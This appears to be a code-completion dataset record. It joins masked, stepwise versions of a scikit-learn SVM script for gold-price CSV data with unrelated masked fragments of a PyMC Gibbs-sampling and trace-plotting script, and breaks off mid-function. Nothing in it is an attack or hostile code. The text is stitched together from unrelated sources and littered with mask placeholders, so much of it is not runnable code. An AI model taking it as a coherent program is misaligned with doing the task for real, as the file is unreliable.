#print(pcaData)
#print('reconMat:-----------------------')
#print(reconMat)
#base.write_a_dataset_to_a_csv('audt365-2018-2-21-day-class21-high100-round-test-svm.csv', pro_date)
#base.write_a_dataset_to_a_csv('hjxh365-2018-4-16-day-plus-norm-clear-pca9999-recn.csv', reconMat)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--learning_rate',
type=float,
default=0.01,
help='Initial learning rate.'
)
parser.add_argument(
'--max_steps',
type=int,
default=100000,
help='Number of steps to run trainer.'
)
parser.add_argument(
'--percentage',
type=float,
default=0.99,
help='Number of float for pca remain percentage.'
)
parser.add_argument(
'--hidden2',
type=int,
default=32,
help='Number of units in hidden layer 2.'
)
parser.add_argument(
'--batch_size',
type=int,
default=1,
help='Batch size. Must divide evenly into the dataset sizes.'
)
parser.add_argument(
'--input_data_dir',
type=str,
default='/home/freebirdweij/tf_works/invest',
help='Directory to put the input data.'
)
parser.add_argument(
'--log_dir',
type=str,
default='/home/freebirdweij/tf_works/invest/logs',
help='Directory to put the log data.'
)
parser.add_argument(
'--fake_data',
default=False,
help='If true, uses fake data for unit testing.',
action='store_true'
)
FLAGS, unparsed = parser.parse_known_args()
main()
|
flexible
|
{
"blob_id": "49995e60b817e2c5a2ea7e85e4fe96ca95363cb2",
"index": 2148,
"step-1": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\n<mask token>\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\ndef grid_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}\n cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)\n cls.fit(X_train, y_train)\n print('Best estimotor by GridSearchCV:')\n print(cls.best_estimator_)\n\n\n<mask token>\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\ndef grid_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}\n cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)\n cls.fit(X_train, y_train)\n print('Best estimotor by GridSearchCV:')\n print(cls.best_estimator_)\n\n\ndef test_SVC_sigmod(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n gammas = range(1, 2)\n train_scores = []\n test_scores = []\n for gamma in gammas:\n cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(gammas, train_scores, label='Training score ', marker='+')\n ax.plot(gammas, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_sigmoid_gamma ')\n ax.set_xscale('log')\n ax.set_xlabel('$\\\\gamma$')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef test_linearSVC(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.LinearSVC()\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_linear(*data):\n X_train, X_test, y_train, y_test = data\n cls = svm.SVC(kernel='linear')\n cls.fit(X_train, y_train)\n print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n\n\ndef test_SVC_poly(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n degrees = range(1, 2)\n train_scores = []\n test_scores = []\n for degree in degrees:\n cls = svm.SVC(kernel='poly', degree=degree)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 3, 1)\n ax.plot(degrees, train_scores, label='Training score ', marker='+')\n ax.plot(degrees, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_poly_degree ')\n ax.set_xlabel('p')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef test_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)\n cls.fit(X_train, y_train)\n print('Scors:%.2f' % cls.score(X_test, y_test))\n print('probability')\n print(cls.predict(X_test))\n return cls.predict_proba(X_test)\n\n\ndef grid_SVC_rbf(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}\n cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)\n cls.fit(X_train, y_train)\n print('Best estimotor by GridSearchCV:')\n print(cls.best_estimator_)\n\n\ndef test_SVC_sigmod(*data):\n X_train, X_test, y_train, y_test = data\n fig = plt.figure()\n gammas = range(1, 2)\n train_scores = []\n test_scores = []\n for gamma in gammas:\n cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)\n cls.fit(X_train, y_train)\n train_scores.append(cls.score(X_train, y_train))\n test_scores.append(cls.score(X_test, y_test))\n print('Scors:%.2f' % cls.score(X_test, y_test))\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(gammas, train_scores, label='Training score ', marker='+')\n ax.plot(gammas, test_scores, label='Testing score ', marker='o')\n ax.set_title('SVC_sigmoid_gamma ')\n ax.set_xscale('log')\n ax.set_xlabel('$\\\\gamma$')\n ax.set_ylabel('score')\n ax.set_ylim(0, 1.05)\n ax.legend(loc='best', framealpha=0.5)\n plt.show()\n\n\ndef main():\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\n train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.\n int16, features_dtype=np.float32, target_column=0)\n test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,\n test_datas.target)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--learning_rate', type=float, default=0.01, help=\n 'Initial learning rate.')\n parser.add_argument('--max_steps', type=int, default=100000, help=\n 'Number of steps to run trainer.')\n parser.add_argument('--percentage', type=float, default=0.99, help=\n 'Number of float for pca remain percentage.')\n parser.add_argument('--hidden2', type=int, default=32, help=\n 'Number of units in hidden layer 2.')\n parser.add_argument('--batch_size', type=int, default=1, help=\n 'Batch size. Must divide evenly into the dataset sizes.')\n parser.add_argument('--input_data_dir', type=str, default=\n '/home/freebirdweij/tf_works/invest', help=\n 'Directory to put the input data.')\n parser.add_argument('--log_dir', type=str, default=\n '/home/freebirdweij/tf_works/invest/logs', help=\n 'Directory to put the log data.')\n parser.add_argument('--fake_data', default=False, help=\n 'If true, uses fake data for unit testing.', action='store_true')\n FLAGS, unparsed = parser.parse_known_args()\n main()\n",
"step-5": "'''\r\nCreated on 2018-9-8\r\n\r\n@author: weij\r\n'''\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport time\r\nimport numpy as np\r\n\r\n\r\nfrom numpy import shape\r\nfrom scipy import linalg\r\nfrom sklearn import datasets,linear_model,cross_validation,svm\r\nfrom sklearn.grid_search import GridSearchCV\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\nimport com.freebirdweij.goldanalyse.ml.data_util as base\r\nimport matplotlib.pyplot as plt\r\n\r\ndef test_linearSVC(*data):\r\n X_train,X_test,y_train,y_test = data\r\n cls = svm.LinearSVC()\r\n cls.fit(X_train, y_train)\r\n print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\ndef test_SVC_linear(*data):\r\n X_train,X_test,y_train,y_test = data\r\n cls = svm.SVC(kernel='linear')\r\n cls.fit(X_train, y_train)\r\n print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\ndef test_SVC_poly(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n degrees = range(1,2)\r\n train_scores=[]\r\n test_scores=[]\r\n for degree in degrees:\r\n cls = svm.SVC(kernel='poly',degree=degree)\r\n cls.fit(X_train, y_train)\r\n train_scores.append(cls.score(X_train, y_train))\r\n test_scores.append(cls.score(X_test, y_test))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\n ax=fig.add_subplot(1,3,1)\r\n ax.plot(degrees,train_scores,label=\"Training score \",marker='+')\r\n ax.plot(degrees,test_scores,label=\"Testing score \",marker='o')\r\n ax.set_title(\"SVC_poly_degree \")\r\n ax.set_xlabel(\"p\")\r\n ax.set_ylabel(\"score\")\r\n ax.set_ylim(0,1.05)\r\n ax.legend(loc=\"best\",framealpha=0.5)\r\n plt.show()\r\n \r\ndef test_SVC_rbf(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n #gammas = range(1,2)\r\n #train_scores=[]\r\n #test_scores=[]\r\n #for gamma in gammas:\r\n cls = svm.SVC(C=1e3,kernel='rbf',gamma=0.1,probability=True)\r\n cls.fit(X_train, y_train)\r\n #train_scores.append(cls.score(X_train, y_train))\r\n #test_scores.append(cls.score(X_test, y_test))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n print('probability')\r\n print(cls.predict(X_test))\r\n return cls.predict_proba(X_test)\r\n \r\n #ax=fig.add_subplot(1,1,1)\r\n #ax.plot(gammas,train_scores,label=\"Training score \",marker='+')\r\n #ax.plot(gammas,test_scores,label=\"Testing score \",marker='o')\r\n #ax.set_title(\"SVC_rbf \")\r\n #ax.set_xlabel(r\"$\\gamma$\")\r\n #ax.set_ylabel(\"score\")\r\n #ax.set_ylim(0,1.05)\r\n #ax.legend(loc=\"best\",framealpha=0.5)\r\n #plt.show()\r\n \r\ndef grid_SVC_rbf(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n param_grid = {'C':[1e3,5e3,1e4,5e4,1e5],\r\n 'gamma':[0.0001,0.0005,0.001,0.005,0.01,0.1]}\r\n cls = GridSearchCV(svm.SVC(kernel='rbf'),param_grid)\r\n cls.fit(X_train, y_train)\r\n print('Best estimotor by GridSearchCV:')\r\n print(cls.best_estimator_)\r\n \r\n \r\ndef test_SVC_sigmod(*data):\r\n X_train,X_test,y_train,y_test = data\r\n fig = plt.figure()\r\n ### test degree ###\r\n gammas = range(1,2)\r\n train_scores=[]\r\n test_scores=[]\r\n for gamma in gammas:\r\n cls = svm.SVC(kernel='sigmoid',gamma=gamma,coef0=0)\r\n cls.fit(X_train, y_train)\r\n train_scores.append(cls.score(X_train, y_train))\r\n test_scores.append(cls.score(X_test, y_test))\r\n print('Scors:%.2f'%cls.score(X_test, y_test))\r\n \r\n ax=fig.add_subplot(1,1,1)\r\n ax.plot(gammas,train_scores,label=\"Training score \",marker='+')\r\n ax.plot(gammas,test_scores,label=\"Testing score \",marker='o')\r\n ax.set_title(\"SVC_sigmoid_gamma \")\r\n ax.set_xscale(\"log\")\r\n ax.set_xlabel(r\"$\\gamma$\")\r\n ax.set_ylabel(\"score\")\r\n ax.set_ylim(0,1.05)\r\n ax.legend(loc=\"best\",framealpha=0.5)\r\n plt.show()\r\n \r\ndef main():\r\n \r\n DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'\r\n DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'\r\n\r\n train_datas = base.load_csv_without_header(DATA_TRAIN,target_dtype=np.int16,\r\n features_dtype=np.float32,target_column=0)\r\n test_datas = base.load_csv_without_header(DATA_TEST,target_dtype=np.int16,\r\n features_dtype=np.float32,target_column=0)\r\n \r\n test_SVC_sigmod(train_datas.data,test_datas.data,train_datas.target,test_datas.target)\r\n #pro_date = test_SVC_rbf(train_datas.data,test_datas.data,train_datas.target,test_datas.target)\r\n \r\n #dataMat = input_datas.data\r\n #print('dataMat:-----------------------')\r\n #print(dataMat)\r\n\r\n #pcaData = np.dot(dataMat,eig_vect)\r\n #reconMat = np.dot(pcaData,eig_vect.T)+mean_v #Reconstructed datas.\r\n #print('k:-----------------------')\r\n #print(k)\r\n #print('pcaData:-----------------------')\r\n #print(pcaData)\r\n #print('reconMat:-----------------------')\r\n #print(reconMat)\r\n #base.write_a_dataset_to_a_csv('audt365-2018-2-21-day-class21-high100-round-test-svm.csv', pro_date)\r\n #base.write_a_dataset_to_a_csv('hjxh365-2018-4-16-day-plus-norm-clear-pca9999-recn.csv', reconMat)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n '--learning_rate',\r\n type=float,\r\n default=0.01,\r\n help='Initial learning rate.'\r\n )\r\n parser.add_argument(\r\n '--max_steps',\r\n type=int,\r\n default=100000,\r\n help='Number of steps to run trainer.'\r\n )\r\n parser.add_argument(\r\n '--percentage',\r\n type=float,\r\n default=0.99,\r\n help='Number of float for pca remain percentage.'\r\n )\r\n parser.add_argument(\r\n '--hidden2',\r\n type=int,\r\n default=32,\r\n help='Number of units in hidden layer 2.'\r\n )\r\n parser.add_argument(\r\n '--batch_size',\r\n type=int,\r\n default=1,\r\n help='Batch size. Must divide evenly into the dataset sizes.'\r\n )\r\n parser.add_argument(\r\n '--input_data_dir',\r\n type=str,\r\n default='/home/freebirdweij/tf_works/invest',\r\n help='Directory to put the input data.'\r\n )\r\n parser.add_argument(\r\n '--log_dir',\r\n type=str,\r\n default='/home/freebirdweij/tf_works/invest/logs',\r\n help='Directory to put the log data.'\r\n )\r\n parser.add_argument(\r\n '--fake_data',\r\n default=False,\r\n help='If true, uses fake data for unit testing.',\r\n action='store_true'\r\n )\r\n\r\n FLAGS, unparsed = parser.parse_known_args()\r\n main()\r\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X):
if X[0] ** 2 + X[1] ** 2 <= 1.0:
return 0
else:
return -pl.inf
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
def plot_trace(X, scale=1.0, angle=0.0):
fig = pl.figure(figsize=(12, 4.75))
ax1 = fig.add_subplot(1, 2, 1)
t = pl.arange(0, 2 * pl.pi, 0.01)
ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,
pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:, 0], X.trace()[:, 1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1, 1.1, -1.1, 1.1])
pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3 + 4 * i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25, 50, 75])
pl.yticks([-0.5, 0, 0.5])
pl.ylabel('$X_%d$' % (i + 1), rotation=0)
pl.axis([-5, 105, -1.5, 1.5])
pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4 + 4 * i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5, 0, 5])
pl.yticks([0.0, 0.5, 1])
pl.axis([-12, 12, -0.1, 1.1])
pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4.0):
if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X
[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X):
if X[0] ** 2 + X[1] ** 2 <= 1.0:
return 0
else:
return -pl.inf
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
def plot_trace(X, scale=1.0, angle=0.0):
fig = pl.figure(figsize=(12, 4.75))
ax1 = fig.add_subplot(1, 2, 1)
t = pl.arange(0, 2 * pl.pi, 0.01)
ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,
pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:, 0], X.trace()[:, 1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1, 1.1, -1.1, 1.1])
pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3 + 4 * i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25, 50, 75])
pl.yticks([-0.5, 0, 0.5])
pl.ylabel('$X_%d$' % (i + 1), rotation=0)
pl.axis([-5, 105, -1.5, 1.5])
pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4 + 4 * i)
ax3.acorr(tr[i].reshape(100), color='k')
else:
ax3a = fig.add_subplot(2, 4, 4 + 4 * i, sharex=ax3)
ax3a.acorr(tr[i].reshape(100), color='k')
pl.xlabel('Autocorrelation')
pl.xticks([-5, 0, 5])
pl.yticks([0.0, 0.5, 1])
pl.axis([-12, 12, -0.1, 1.1])
pl.text(-10, 1, '(%s)' % 'de'[i], fontsize=16, va='top', ha='left')
pl.setp(ax2.get_xticklabels(), visible=False)
pl.setp(ax3.get_xticklabels(), visible=False)
pl.subplots_adjust(wspace=0.55, hspace=0.1, bottom=0.14, left=0.13)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4.0):
if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X
[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X, s=3.0, t=pl.pi / 4):
if (pl.cos(t) * X[0] + pl.sin(t) * X[1]) ** 2 + s ** 2 * (pl.cos(t) * X
[1] - pl.sin(t) * X[0]) ** 2 <= 1.0:
return 0
else:
return -pl.inf
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
reload(book_graphics)
mc.np.random.seed(1234567)
<|reserved_special_token_0|>
@mc.potential
def in_ball(X=X):
if X[0] ** 2 + X[1] ** 2 <= 1.0:
return 0
else:
return -pl.inf
class UniformBall(mc.Gibbs):
def __init__(self, stochastic, others, verbose=None):
self.others = others
self.conjugate = True
mc.Gibbs.__init__(self, stochastic, verbose)
def propose(self):
x_other = [X_i.value for X_i in self.others]
max_val = pl.sqrt(1.0 - pl.dot(x_other, x_other))
self.stochastic.value = mc.runiform(-max_val, max_val)
<|reserved_special_token_0|>
for i in range(n):
m.use_step_method(UniformBall, X[i], [X[j] for j in range(n) if j != i])
m.sample(100, progress_bar=False)
def plot_trace(X, scale=1.0, angle=0.0):
fig = pl.figure(figsize=(12, 4.75))
ax1 = fig.add_subplot(1, 2, 1)
t = pl.arange(0, 2 * pl.pi, 0.01)
ax1.plot(pl.cos(angle) * pl.cos(t) - pl.sin(angle) * pl.sin(t) / scale,
pl.cos(angle) * pl.sin(t) / scale + pl.sin(angle) * pl.cos(t), 'k:')
if isinstance(X, mc.Stochastic):
tr = [X.trace()[:, 0], X.trace()[:, 1]]
else:
tr = [X[0].trace(), X[1].trace()]
ax1.plot(tr[0], tr[1], 'ko-')
book_graphics.set_font()
pl.xlabel('$X_1$')
pl.ylabel('$X_2$', rotation=0)
pl.axis([-1.1, 1.1, -1.1, 1.1])
pl.text(-1, 1, '(a)', fontsize=16, va='top', ha='left')
for i in range(2):
if i == 0:
ax2 = fig.add_subplot(2, 4, 3 + 4 * i)
ax2.plot(tr[i], 'k', drawstyle='steps-mid')
else:
ax2a = fig.add_subplot(2, 4, 3 + 4 * i, sharex=ax2)
ax2a.plot(tr[i], 'k', drawstyle='steps-mid')
pl.xlabel('Sample')
pl.xticks([25, 50, 75])
pl.yticks([-0.5, 0, 0.5])
pl.ylabel('$X_%d$' % (i + 1), rotation=0)
pl.axis([-5, 105, -1.5, 1.5])
pl.text(-1, 1.25, '(%s)' % 'bc'[i], fontsize=16, va='top', ha='left')
if i == 0:
ax3 = fig.add_subplot(2, 4, 4 + 4 * i)
